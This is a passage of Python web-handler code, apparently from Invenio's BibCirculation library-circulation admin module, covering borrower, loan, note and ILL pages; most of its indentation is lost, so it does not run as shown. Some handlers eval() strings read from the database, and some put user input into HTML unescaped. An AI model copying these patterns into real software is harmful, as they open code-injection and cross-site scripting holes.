(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
return page(title=_("Item search"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def item_search_result(req, p, f, ln=CFG_SITE_LANG):
"""
    Search for an item and return a list with all the possible results.
    To retrieve the desired information, we use the method
    'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if p == '':
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
return item_search(req, infos, ln)
if f == 'barcode':
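        # Scanned or pasted barcodes often arrive wrapped in quotes or
        # whitespace, so strip those characters before the lookup.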
p = p.strip('\'" \t')
recid = db.get_id_bibrec(p)
if recid is None:
            infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist in the BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
else:
return get_item_details(req, recid, ln=ln)
elif f == 'recid':
p = p.strip('\'" \t')
recid = p
if not record_exists(recid):
infos.append(_("Requested record does not seem to exist."))
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
else:
return get_item_details(req, recid, ln=ln)
else:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
body = bc_templates.tmpl_item_search_result(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Item search result"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Borrower" related templates
###
def get_borrower_details(req, borrower_id, update, ln=CFG_SITE_LANG):
"""
Display the details of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if update and CFG_CERN_SITE:
update_user_info_from_ldap(borrower_id)
borrower = db.get_borrower_details(borrower_id)
    if borrower is None:
info = _('Borrower not found.') + ' ' + _('Please, try again.')
return borrower_search(req, info, False, ln)
else:
requests = db.get_borrower_request_details(borrower_id)
loans = db.get_borrower_loan_details(borrower_id)
notes = db.get_borrower_notes(borrower_id)
ill = db.get_ill_requests_details(borrower_id)
proposals = db.get_proposal_requests_details(borrower_id)
req_hist = db.bor_requests_historical_overview(borrower_id)
loans_hist = db.bor_loans_historical_overview(borrower_id)
ill_hist = db.bor_ill_historical_overview(borrower_id)
proposal_hist = db.bor_proposal_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_details(borrower=borrower,
requests=requests,
loans=loans,
notes=notes,
ill=ill,
proposals=proposals,
req_hist=req_hist,
loans_hist=loans_hist,
ill_hist=ill_hist,
proposal_hist=proposal_hist,
ln=ln)
return page(title=_("Borrower details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step1(req, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 1
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_borrower_step1(ln=ln)
return page(title=_("Add new borrower") + " - I",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step2(req, name, email, phone, address, mailbox,
notes, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 2.
@type name: string.
@type email: string.
@type phone: string.
@type address: string.
@type mailbox: string.
@type notes: string.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if name == '':
infos.append(_("Please, insert a name"))
if email == '':
infos.append(_("Please, insert a valid email address"))
else:
borrower_id = db.get_borrower_id_by_email(email)
if borrower_id is not None:
infos.append(_("There is already a borrower using the following email:")
+ " <strong>%s</strong>" % (email))
tup_infos = (name, email, phone, address, mailbox, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if len(infos) > 0:
body = bc_templates.tmpl_add_new_borrower_step1(tup_infos=tup_infos,
infos=infos, ln=ln)
title = _("Add new borrower") + " - I"
else:
if notes != '':
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
borrower_notes[note_time] = notes
else:
borrower_notes = ''
borrower_id = db.new_borrower(None, name, email, phone,
address, mailbox, borrower_notes)
return redirect_to_url(req,
'%s/admin2/bibcirculation/get_borrower_details?ln=%s&borrower_id=%s' \
% (CFG_SITE_SECURE_URL, ln, borrower_id))
#body = bc_templates.tmpl_add_new_borrower_step2(tup_infos=tup_infos,
# infos=infos, ln=ln)
#title = _("Add new borrower") + " - II"
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step3(req, tup_infos, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 3.
@type tup_infos: tuple.
@param tup_infos: tuple containing borrower information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if tup_infos[5] != '':
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
borrower_notes[note_time] = str(tup_infos[5])
else:
borrower_notes = ''
db.new_borrower(None, tup_infos[0], tup_infos[1], tup_infos[2],
tup_infos[3], tup_infos[4], str(borrower_notes))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_borrower_step3(ln=ln)
return page(title=_("Add new borrower") + " - III",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_borrower_info_step1(req, borrower_id, ln=CFG_SITE_LANG):
"""
Update the borrower's information.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
borrower_details = db.get_borrower_details(borrower_id)
tup_infos = (borrower_details[0], borrower_details[2], borrower_details[3],
borrower_details[4], borrower_details[5], borrower_details[6])
body = bc_templates.tmpl_update_borrower_info_step1(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update borrower information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_borrower_info_step2(req, borrower_id, name, email, phone, address,
mailbox, ln=CFG_SITE_LANG):
"""
Update the borrower's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if name == '':
infos.append(_("Please, insert a name"))
if email == '':
infos.append(_("Please, insert a valid email address"))
else:
borrower_email_id = db.get_borrower_id_by_email(email)
if borrower_email_id is not None and borrower_id != borrower_email_id:
infos.append(_("There is already a borrower using the following email:")
+ " <strong>%s</strong>" % (email))
tup_infos = (borrower_id, name, email, phone, address, mailbox)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if len(infos) > 0:
body = bc_templates.tmpl_update_borrower_info_step1(tup_infos=tup_infos,
infos=infos, ln=ln)
else:
db.update_borrower_info(borrower_id, name, email,
phone, address, mailbox)
return redirect_to_url(req,
'%s/admin2/bibcirculation/get_borrower_details?ln=%s&borrower_id=%s' \
% (CFG_SITE_SECURE_URL, ln, borrower_id))
return page(title=_("Update borrower information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_requests_details(req, borrower_id, request_id,
ln=CFG_SITE_LANG):
"""
    Display the hold requests of a borrower and, optionally, cancel one.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type request_id: integer.
@param request_id: identify the hold request to be cancelled
@return: borrower requests details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
db.cancel_request(request_id)
update_request_data(request_id)
result = db.get_borrower_request_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("Hold requests details") + " - %s" % (name)
body = bc_templates.tmpl_borrower_request_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_loans_details(req, recid, barcode, borrower_id,
renewal, force, loan_id, ln=CFG_SITE_LANG):
"""
Show borrower's loans details.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type renewal: string.
@param renewal: renew all loans.
@type force: string.
@param force: force the renew of a loan, when usually this is not possible.
@type loan_id: integer.
    @param loan_id: identify a loan. It is the primary key of the table
crcLOAN.
@return: borrower loans details.
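
    Example of the force-renew link built below (illustrative; the parameter
    values are hypothetical):
        create_html_link(CFG_SITE_SECURE_URL +
            '/admin2/bibcirculation/get_borrower_loans_details',
            {'barcode': '123', 'borrower_id': 1, 'loan_id': 7,
             'force': 'true', 'ln': 'en'}, 'Yes')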
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
force_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'barcode': barcode, 'borrower_id': borrower_id,
'loan_id': loan_id, 'force': 'true', 'ln': ln},
(_("Yes")))
no_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'borrower_id': borrower_id, 'ln': ln},
(_("No")))
if barcode and loan_id and recid:
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renew_link, no_renew_link)
infos.append(message)
else:
#db.update_due_date(loan_id, new_due_date)
db.renew_loan(loan_id, new_due_date)
#update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
elif loan_id and barcode and force == 'true':
new_due_date = renew_loan_for_X_days(barcode)
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
    elif borrower_id and renewal == 'true':
list_of_loans = db.get_recid_borrower_loans(borrower_id)
for (loan_id, recid, barcode) in list_of_loans:
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
force_renewall_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'barcode': barcode, 'borrower_id': borrower_id,
'loan_id': loan_id, 'force': 'true', 'ln': ln},
(_("Yes")))
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renewall_link, no_renew_link)
infos.append(message)
else:
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
if infos == []:
infos.append(_("All loans renewed with success."))
borrower_loans = db.get_borrower_loan_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_loans_details(
borrower_loans=borrower_loans,
borrower_id=borrower_id,
infos=infos, ln=ln)
return page(title=_("Loans details") + \
" - %s" %(db.get_borrower_name(borrower_id)),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_loans_historical_overview(req, borrower_id, ln=CFG_SITE_LANG):
"""
Display the loans historical overview of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@return: borrower loans - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loans_hist_overview = db.bor_loans_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_bor_loans_historical_overview(
loans_hist_overview = loans_hist_overview,
ln=ln)
return page(title=_("Loans") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_requests_historical_overview(req, borrower_id, ln=CFG_SITE_LANG):
"""
Display the requests historical overview of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@return: borrower requests - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
req_hist_overview = db.bor_requests_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_bor_requests_historical_overview(
req_hist_overview = req_hist_overview,
ln=ln)
return page(title=_("Requests") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_ill_details(req, borrower_id, request_type='', ln=CFG_SITE_LANG):
"""
Display ILL details of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
    @type request_type: string.
    @param request_type: 'proposal-book' to list the borrower's book
                         proposals instead of regular ILL requests.
@return: borrower ILL details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_type == 'proposal-book':
result = db.get_proposal_requests_details(borrower_id)
else:
result = db.get_ill_requests_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("ILL details") + "- %s" % (name)
body = bc_templates.tmpl_borrower_ill_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_ill_historical_overview(req, borrower_id, request_type='', ln=CFG_SITE_LANG):
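    """
    Display the ILL/proposal historical overview of a borrower.
    """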
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_type == 'proposal-book':
result = db.bor_proposal_historical_overview(borrower_id)
else:
result = db.bor_ill_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("ILL historical overview") + " - %s" % (name)
body = bc_templates.tmpl_borrower_ill_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_notification(req, borrower_id, template, message, load_msg_template,
subject, send_message, from_address, ln=CFG_SITE_LANG):
"""
Send an email to a borrower or simply load and display an editable email
template.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
    @type template: string.
    @param template: The name of the notification template to be loaded.
                     If @param load_msg_template holds 'False', the value
                     is used verbatim as the email body instead of being
                     loaded as a template.
    @type load_msg_template: string.
    @param load_msg_template: 'True' to load @param template by name,
                              'False' to use @param template verbatim as
                              the email body.
    @type send_message: string.
    @param send_message: if set, send @param message to the borrower.
@type message: string.
@param message: Message to be sent if the flag @param send_message is set.
@type subject: string.
@param subject: Subject of the message.
@type from_address: string.
@param from_address: From address in the message sent.
@return: Display the email template or send an email to a borrower.
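
    Example (illustrative; the template name and values are hypothetical):
        borrower_notification(req, 42, template='overdue_letter',
                              message=None, load_msg_template='True',
                              subject='Overdue loan', send_message=None,
                              from_address=CFG_BIBCIRCULATION_ILLS_EMAIL)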
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
email = db.get_borrower_email(borrower_id)
if load_msg_template == 'False' and template is not None:
# Do not load the template. It is the email body itself.
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=template,
borrower_id=borrower_id,
from_address=from_address,
ln=ln)
elif send_message:
send_email(fromaddr = from_address,
toaddr = email,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times = 1,
attempt_sleeptime = 10
)
body = bc_templates.tmpl_send_notification(ln=ln)
else:
show_template = load_template(template)
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=show_template,
borrower_id=borrower_id,
from_address=from_address,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title="User Notification",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_notes(req, borrower_id, delete_key, library_notes,
ln=CFG_SITE_LANG):
"""
Retrieve the notes of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
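
    Notes are stored as a stringified dictionary keyed by timestamp, e.g.
    (illustrative value): "{'2013-05-02 14:01:00': 'Lost card reported.'}";
    the guards below recover it with looks_like_dictionary() and eval().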
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and borrower_id:
if looks_like_dictionary(db.get_borrower_notes(borrower_id)):
borrower_notes = eval(db.get_borrower_notes(borrower_id))
if delete_key in borrower_notes.keys():
del borrower_notes[delete_key]
db.update_borrower_notes(borrower_id, borrower_notes)
elif library_notes:
if db.get_borrower_notes(borrower_id):
if looks_like_dictionary(db.get_borrower_notes(borrower_id)):
borrower_notes = eval(db.get_borrower_notes(borrower_id))
else:
borrower_notes = {}
else:
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
if note_time not in borrower_notes.keys():
borrower_notes[note_time] = str(library_notes)
db.update_borrower_notes(borrower_id, borrower_notes)
borrower_notes = db.get_borrower_notes(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_borrower_notes(borrower_notes=borrower_notes,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Borrower notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_search(req, empty_barcode, redirect_to_new_request=False,
ln=CFG_SITE_LANG):
"""
    Page (for administrators) where it is possible to search
    for a borrower (who is in the crcBORROWER table) using his/her name,
email, phone or id.
If redirect_to_new_request is False, the returned page will be "Borrower details"
If redirect_to_new_request is True, the returned page will be "New Request"
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if empty_barcode:
infos.append(empty_barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_borrower_search(infos=infos,
redirect_to_new_request=redirect_to_new_request,
ln=ln)
if redirect_to_new_request:
title = _("New Request")
else:
title = _("Borrower Search")
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_search_result(req, column, string, redirect_to_new_request=False,
ln=CFG_SITE_LANG):
"""
Search a borrower and return a list with all the possible results.
@type column: string
@param column: identify the column, of the table crcBORROWER, that will be
considered during the search. Can be 'name', 'email' or 'id'.
@type string: string
@param string: string used for the search process.
If redirect_to_new_request is True, the returned page will be "Borrower details"
If redirect_to_new_request is False, the returned page will be "New Request"
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if string == '':
message = _('Empty string.') + ' ' + _('Please, try again.')
return borrower_search(req, message, redirect_to_new_request, ln)
else:
result = search_user(column, string)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
if len(result) == 1:
if redirect_to_new_request:
return create_new_request_step1(req, result[0][0])
else:
return get_borrower_details(req, result[0][0], False, ln)
#return create_new_request_step1(req, borrower_id, p, f, search, ln)
else:
body = bc_templates.tmpl_borrower_search_result(result=result,
redirect_to_new_request=redirect_to_new_request,
ln=ln)
return page(title=_("Borrower search result"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### ILL/Purchase/Acquisition related functions.
### The naming of these methods is not intuitive; it should be improved
### and appropriate documentation added where required. The methods
### could also be refactored.
###
def register_ill_from_proposal(req, ill_request_id, bor_id=None, ln=CFG_SITE_LANG):
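    """
    Create an ILL request from an accepted book proposal.
    @type ill_request_id: integer.
    @param ill_request_id: identify the proposal. It is also the primary key
                           of the table crcILLREQUEST.
    @type bor_id: integer.
    @param bor_id: identify the borrower; when None, the borrower attached
                   to the proposal is used instead.
    """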
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
book_info = db.get_ill_book_info(ill_request_id)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if not bor_id:
bid = db.get_ill_borrower(ill_request_id)
else:
bid = bor_id
if 'recid' in book_info and bid:
recid = book_info['recid']
if not db.has_loan_request(bid, recid, ill=1):
db.tag_requests_as_done(bid, recid=recid)
library_notes = {}
library_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
_("This ILL has been created from a proposal.")
db.register_ill_from_proposal(ill_request_id,
bid, library_notes)
infos.append(_('An ILL has been created for the user.'))
else:
infos.append(_('An active ILL already exists for this user on this record.'))
else:
infos.append(_('Could not create an ILL from the proposal'))
else:
infos.append(_('Could not create an ILL from the proposal'))
ill_req = db.get_ill_requests(CFG_BIBCIRCULATION_ILL_STATUS_NEW)
body = bc_templates.tmpl_list_ill(ill_req, infos=infos, ln=ln)
return page(title=_("ILL requests"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
#return redirect_to_url(req,
# '%s/admin2/bibcirculation/list_proposal?status=%s' % \
# (CFG_SITE_SECURE_URL, CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE))
def register_ill_request_with_no_recid_step1(req, borrower_id,
ln=CFG_SITE_LANG):
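    """
    Register an ILL request with no recid. Step 1: display the request form.
    """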
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
borrower_id=borrower_id,
admin=True, ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step2(req, title, authors, place,
publisher, year, edition, isbn, budget_code,
period_of_interest_from, period_of_interest_to,
additional_comments, only_edition, key, string,
borrower_id, ln=CFG_SITE_LANG):
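    """
    Register an ILL request with no recid. Step 2: validate the dates and
    search for the borrower who will be attached to the request.
    """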
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
book_info = (title, authors, place, publisher, year, edition, isbn)
request_details = (budget_code, period_of_interest_from,
period_of_interest_to, additional_comments, only_edition)
if borrower_id in (None, '', 'None'):
body = None
if not key:
borrowers_list = None
elif not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
borrowers_list = None
else:
if validate_date_format(period_of_interest_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
borrower_id=None,
admin=True,
ln=ln)
elif validate_date_format(period_of_interest_to) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
ln=ln)
else:
result = search_user(key, string)
borrowers_list = []
if len(result) == 0:
infos.append(_("0 borrowers found."))
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
    if body is None:
body = bc_templates.tmpl_register_ill_request_with_no_recid_step2(
book_info=book_info, request_details=request_details,
result=borrowers_list, key=key, string=string,
infos=infos, ln=ln)
else:
user_info = db.get_borrower_data_by_id(borrower_id)
return register_ill_request_with_no_recid_step3(req, title, authors,
place, publisher,year, edition,
isbn, user_info, budget_code,
period_of_interest_from,
period_of_interest_to,
additional_comments, only_edition,
ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step3(req, title, authors, place,
publisher, year, edition, isbn,
user_info, budget_code,
period_of_interest_from,
period_of_interest_to,
additional_comments,
only_edition, ln=CFG_SITE_LANG):
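    """
    Register an ILL request with no recid. Step 3: confirm the request
    details for the selected borrower.
    """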
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
